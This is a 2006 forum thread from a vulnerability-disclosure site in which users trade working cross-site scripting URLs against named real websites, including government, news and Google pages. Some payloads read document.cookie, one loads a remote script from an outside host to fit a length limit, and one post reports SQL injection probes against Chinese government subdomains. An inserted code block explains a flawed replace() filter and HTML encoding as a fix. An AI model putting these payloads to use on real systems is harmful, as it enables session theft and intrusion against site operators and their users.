Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 28 of 65
Re: So it begins
Posted by: mesca
Date: November 14, 2006 10:46AM

Wow, this time they fixed it in 20 minutes!

– mesca
« Reality is merely an illusion, albeit a very persistent one. » – Albert Einstein

Re: So it begins
Posted by: maluc
Date: November 14, 2006 11:45AM

heh, well all he had to do to fix it was add the letter 'g' inside the .replace() .. so that's no surprise. Good job on following up on the fix to test out its new filter.

Sadly though, most all of these XSS holes are one-line fixes, or even a couple lines - yet go unpatched/ignored for months

-maluc

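An added illustration of the one-letter fix maluc describes (example code, not from the thread or the site in question): `String.prototype.replace` with a pattern that lacks the `g` flag rewrites only the first match, so a filter built on it leaves every later occurrence untouched, and even the global version is still a blacklist, whereas encoding the markup characters makes the value inert.

```javascript
// Added example: the non-global .replace() filter, the 'g'-flag fix, and
// output encoding as the mitigation a defender should actually ship.
// Function names and sample inputs are constructed for this illustration.

// Filter as described in the thread before the fix: without 'g', only the
// FIRST <script> is removed and anything after it survives.
function stripScriptOnce(input) {
  return input.replace(/<script>/i, "");
}

// The 20-minute fix: same pattern with the 'g' flag, so every match is removed.
function stripScriptAll(input) {
  return input.replace(/<script>/gi, "");
}

// Stripping one tag name is still a blacklist; encoding the characters HTML
// uses to open markup works regardless of which element an attacker tries.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function htmlEncode(input) {
  return String(input).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Detection check: does a filter's output still open a <script> element?
function stillHasScriptTag(s) {
  return /<script/i.test(s);
}

// Constructed sample input: two script elements in one parameter value.
const doubled = "<script>alert(1)</script><script>alert(2)</script>";

// stripScriptOnce(doubled) -> second <script> survives (stillHasScriptTag: true)
// stripScriptAll(doubled)  -> both removed (stillHasScriptTag: false)
// htmlEncode(doubled)      -> no '<' at all; the browser renders it as text
```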
Re: So it begins
Posted by: fogez
Date: November 14, 2006 11:48AM

This just says it all...and yes, this is a valid site.

http://omfg.com/quickResults.asp?searchtype=D&radiobutton=radiobutton&searchfield=%3Cscript%3Ealert%28%22omfg+I+cant+believe+this+site+is+real%22%29%3C%2Fscript%3E&x=0&y=0

Re: So it begins
Posted by: maluc
Date: November 14, 2006 12:31PM

wow godspeed, you certainly live up to your nick of the speed of god at posting. And welcome to the forums.

on a side note, you might want to use the search function here to check if any have been previously disclosed.. as several of those have. Could save from duplicate efforts. But good work nonetheless..

-maluc

Re: So it begins
Posted by: godspeedsc5
Date: November 14, 2006 12:58PM

maluc-

Thanks and sorry about the dupes, I suspected some of them had probably been discovered - I'll try to do a search in the future before posting more. Is there a single summary post somewhere that has all of them combined into a single list?

If anyone is looking for some more to chew on, take a look at these. I haven't got fully functional links yet but they appear to be vulnerable to XSS as well.

www.chron.com - search field on top
imdb.com/search - character name search
geeksquad.com - sign up link on bottom left

Re: So it begins
Posted by: maluc
Date: November 14, 2006 02:08PM

http://search.chron.com/chronicle/search.do;jsessionid=a8wANAmcLZCf5skcO7?basicSearchFormComponent.resultsPerPage=10&basicSearchFormComponent.pageNum=1&basicSearchFormComponent.maxResults=1000&basicSearchFormComponent.mode=search&basicSearchFormComponent.booleanMode=false&basicSearchFormComponent.propertyGroup=CHRONICLE&basicSearchFormComponent.configName=basic&basicSearchFormComponent.siteName=Chronicle&basicSearchFormComponent.contextMode=false&basicSearchFormComponent.shadowSearchText=asdf%27e%22e%3Ee%3Ce&resultNavigationFormComponent.propertyGroup=CHRONICLE&resultNavigationFormComponent.configName=taxonomy&resultNavigationFormComponent.limitResults=0&iqlRulesFormComponent.configName=iql&iqlRulesFormComponent.processManualRules=true&iqlRulesFormComponent.processSponsoredRules=true&iqlRulesFormComponent.processConcepts=true&archiveSearchFormComponent.selectedInterval=7&archiveSearchFormComponent.selectedFromYear=2006&archiveSearchFormComponent.selectedToYear=2006&selectedSort=Date&basicSearchFormComponent.searchText=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&basicSearchFormComponent.selectedDatabaseNames=Everything
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://imdb.com/Character&char=asdf%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&gender=male&GO.x=10&GO.y=9&GO=search imdb.com
http://sla.ckers.org/forum/read.php?3,44,1186#msg-1186 geeksquad.. although disclosed by Ghozt the day before

and no, there isn't a summary currently :/ .. parsing the pages into a single list is on my To Do list.. but it's been there quite a while :x

-maluc

Re: So it begins
Posted by: godspeedsc5
Date: November 14, 2006 02:59PM


Re: So it begins
Posted by: godspeedsc5
Date: November 14, 2006 03:23PM

maluc-

More if you want to fix up:

http://smallbusiness.dnb.com/advance-search.asp?

Business Name: Test
City: <Insert XSS>
State: Alabama

https://www.chevron.apply2jobs.com/

Keywords: <Insert XSS>

Re: So it begins
Posted by: maluc
Date: November 14, 2006 04:51PM

as disclosed by godspeedsc5:

http://smallbusiness.dnb.com/search-results.asp?name=test&city=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&state=AL&country=US

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.chevron.apply2jobs.com/index.cfm?fuseaction=mExternal.searchJobs&txtKeyword=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E chevron.apply2jobs.com

-maluc

Re: So it begins
Posted by: Ghozt
Date: November 15, 2006 12:30AM

maluc Wrote:
-------------------------------------------------------
> http://sla.ckers.org/forum/read.php?3,44,1186#msg-
> 1186 geeksquad.. although disclosed by Ghozt the
> day before
>
> and no, their isn't a summary currently :/ ..
> parsing the pages into a single list is on my To
> Do list.. but it's been there quite a while :x
>
> -maluc


Yarr, genius!
Just stopping in to say hi, I've been really busy lately so I just check the forums and blog once in a while.

Re: So it begins
Posted by: Kyran
Date: November 15, 2006 12:53AM

http://www.roommateclick.com/error.asp?UID=&Room=0&msg=%3Cscript%3Ealert('ASL?');%3C/script%3E

- Kyran

Re: So it begins
Posted by: jungsonn
Date: November 15, 2006 01:50AM

I always begin on the last page in Google, working my way back. :]

Re: So it begins
Posted by: godspeedsc5
Date: November 15, 2006 11:42AM

A few more...

[www.sxc.hu]
[www.hotels.com]
[www.tucows.com]
[newmeds.phrma.org]
[search.nortel.com]

maluc-

Take a look at these...

http://support.microtek.com/online_support.phtml
Search (Insert XSS)

http://www.accessdata.fda.gov/scripts/cdrh/cfdocs/cfMAUDE/search.cfm?searchoptions=1
Brand Name (Insert XSS)

http://www.cas.org/Support/DDS/ddssearch.html?
Find (Insert XSS)

Re: So it begins
Posted by: maluc
Date: November 15, 2006 12:05PM

as disclosed by godspeed, but click-friendly:
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.microtekusa.com/cgi-bin/search.cgi&boolean=AND&case=Insensitive&terms=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.accessdata.fda.gov/scripts/cdrh/cfdocs/cfMAUDE/Results.cfm?SearchString=&SearchYear=&ProductProblem=&DeviceName=&BrandName=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&Manufacturer=&EventType=&KNumber=K&PMANumber=P&ProductCode=&ReportDateFrom=01%2F01%2F2006&ReportDateTo=09%2F29%2F2006&PAGENUM=10&submit=Search
http://www.cas.org/cgi-bin/ddssearch.pl?string=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

-maluc

Re: So it begins
Posted by: godspeedsc5
Date: November 15, 2006 03:36PM


Re: So it begins
Posted by: rsnake
Date: November 15, 2006 09:18PM

http://shop.garmin.com/orderstatus.jsp?order_number=%3Cscript%20src=//ckers.org/s?

Eesh, this one was a pain in the ass to get fit into the proper space required. This is about as short as I could possibly get it other than getting a shorter domain, or changing the base page on a domain to a piece of JavaScript.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: November 15, 2006 11:43PM

rsnake: for me it becomes this on firefox: <script src=//ckers.org/s</strong >

which is easy enough to add to apache as well

-maluc

Re: So it begins
Posted by: maluc
Date: November 16, 2006 12:22AM

http://www.nist.gov/nta-bin/query2.cgi?org-title=284%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Re: So it begins
Posted by: Ghozt
Date: November 16, 2006 03:13AM

http://origins.firstgov.gov/external/external.jsp?url=javascript%3Aalert%28%22Your%20cookie%20is%3A%20%22%20+%20document.cookie%29 Click to continue.



Edited 1 time(s). Last edit at 11/16/2006 03:13AM by Ghozt.

Re: So it begins
Posted by: godspeedsc5
Date: November 16, 2006 08:32AM

A few more...

[americanart.si.edu]
[www.searchsystems.net]
[heraldtribune.com]
[www.sciencemag.org]
[www.theatlantic.com]

Need click-friendlies...

http://thomas.loc.gov/
Search <Insert XSS>

http://rogerebert.suntimes.com/apps/pbcs.dll/frontpage
Search Reviews <Insert XSS>

Re: So it begins
Posted by: maluc
Date: November 16, 2006 10:05AM

happy to oblige:
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://thomas.loc.gov/cgi-bin/thomas&database=text&query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E thomas.loc.gov
http://rogerebert.suntimes.com/apps/pbcs.dll/classifieds?category=search3&q=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx

-maluc

Re: So it begins
Posted by: rsnake
Date: November 16, 2006 11:51AM

Oops, I typoed that one, maluc, but you're right, that would have worked too: change the file on the server to match whatever was coming down stream in the case where you are limited on space: http://shop.garmin.com/orderstatus.jsp?order_number=%3Cscript%20src=//ckers.org/s%3F

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: unsticky
Date: November 16, 2006 03:33PM

http://blog.chinainfo.gov.cn/blog/index.jsp?UserID=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E


Ever wonder if the Chinese government supported hacking?
http://bjcert.bnii.gov.cn/2j/mj/mj.jsp?unid=20385 Hacking with Google
http://bjcert.beijingit.gov.cn/2j/zxyj/mj.jsp?unid=27007 Limbo CMS?

[edit] While I was going through a few more sites I found an SQL inject on a subdomain off of chinainfo.gov.cn. I played around with it for a bit but couldn't get my injected commands to work, just got plenty of SQL errors. Only thing that happened close to executing was the page wouldn't load after I tried an integer select inject. ie. 777 OR 1=1
[edit 2] Actually we're up to 2 SQL injects :X
http://active.chinainfo.gov.cn/sars/ViewInfoText.jsp?infoid=%27
http://active.chinainfo.gov.cn/ChinaInfo/EBuy/shop_detail.jsp?id=1%20OR%201=1



Edited 3 time(s). Last edit at 11/16/2006 04:03PM by unsticky.

Re: So it begins
Posted by: rsnake
Date: November 16, 2006 04:08PM

Ugh... I don't like the idea of any state sponsored hacking activities. Information warfare is not good.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Ghozt
Date: November 16, 2006 08:24PM

Google
You need to click "I forgot my password."
http://www.google.com/support/accounts/bin/answer.py?answer=48598&fpUrl=javascript%3Aalert%28document.cookie%29

Google #2
Just click the link: http://www.google.com/support/accounts/bin/search.py?query=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&ctx=en%3Asearchbox (I'm sure someone could make it work better if they wanted.)

Orkut
The same as Google #2 but it's orkut.
http://help.orkut.com/bin/search.py?ctx=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&query=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D



Edited 2 time(s). Last edit at 11/16/2006 08:32PM by Ghozt.

Re: So it begins
Posted by: Spikeman
Date: November 16, 2006 08:39PM

The first Google one works, but the second one doesn't in either FF or IE.

The first one is interesting, I'm curious as to how you discovered it.

Re: So it begins
Posted by: Ghozt
Date: November 16, 2006 08:47PM

Wow, surely they didn't fix it THAT fast.
Greasemonkey XSS Assistant+XSS Locator via http://www.google.com/support/accounts/bin/search.py?query=&ctx=en%3Asearchbox
I can't recreate it now, it's awesome if they fixed it that fast, but I don't think they did. It popped up an alert saying "X?" instead of "XSS", that's why I said someone could probably make it work better.

I just messed with fpUrl (forgotpasswordUrl) for a second until I figured out what it did.

I can't redo it with or without the XSS assistant, it's hard to believe that they fixed it that fast, but if they did then good job Google.



Edited 1 time(s). Last edit at 11/16/2006 09:03PM by Ghozt.

Re: So it begins
Posted by: maluc
Date: November 16, 2006 09:08PM

I believe the first link has been previously disclosed in this thread.. somewhere. but as a base64 string (data:text/html;base64;etc.)

and speaking of google, there's another one I'll post in a couple hours (not actually on google, it's just their external search API)

but making this encoding routine is quite a pain - javascript is terrible for debugging :/

-maluc
